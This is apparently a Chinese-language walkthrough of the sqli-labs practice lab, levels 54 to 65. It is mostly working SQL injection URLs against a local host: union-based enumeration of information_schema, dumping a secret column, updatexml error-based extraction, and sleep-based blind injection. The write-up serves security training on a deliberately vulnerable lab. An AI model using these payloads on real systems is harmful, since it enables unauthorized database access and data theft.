sqli-labs项目地址:https://github.com/Audi-1/sqli-labs
正文
注入方法和第一关没啥区别,但是做了一个sql查询次数,在表中tryy
每查询一次会+1,达到10次重置表名和字段名
但是10次
好像没啥影响吧,把过程写一下:
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,user(),database()--+
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='d5fxsrk9r0'--+
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(id,0x7e,sessid,0x7e,secret_ZB6W,0x7e,tryy) from challenges.d5fxsrk9r0--+
和上一关没啥区别,改了参数包裹方式和变成了14次上线提交次数
http://127.0.0.1/sqli-labs/Less-55/?id=-1)union select 1,database(),user()--+
后面的姿势就不赘述了
http://127.0.0.1/sqli-labs/Less-56/?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
http://127.0.0.1/sqli-labs/Less-57/?id=-1"union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
没有回显数据库中执行的结果,而是回显设置好的结果,所以想联合查询把数据通过正常回显出来是不行的,有报错可以使用报错注入
http://127.0.0.1/sqli-labs/Less-58/?id=-1'union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
和上一关一样只是,只是不用闭合了,直接插入,还是使用报错注入
http://127.0.0.1/sqli-labs/Less-59/?id=-1 union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
http://127.0.0.1/sqli-labs/Less-60/?id=-1")union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
http://127.0.0.1/sqli-labs/Less-61/?id=-1'))union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
http://127.0.0.1/sqli-labs/Less-62/?id=1') and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+
http://127.0.0.1/sqli-labs/Less-63/?id=1'and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+
http://127.0.0.1/sqli-labs/Less-64/?id=1))and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+
http://127.0.0.1/sqli-labs/Less-65/?id=1") and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+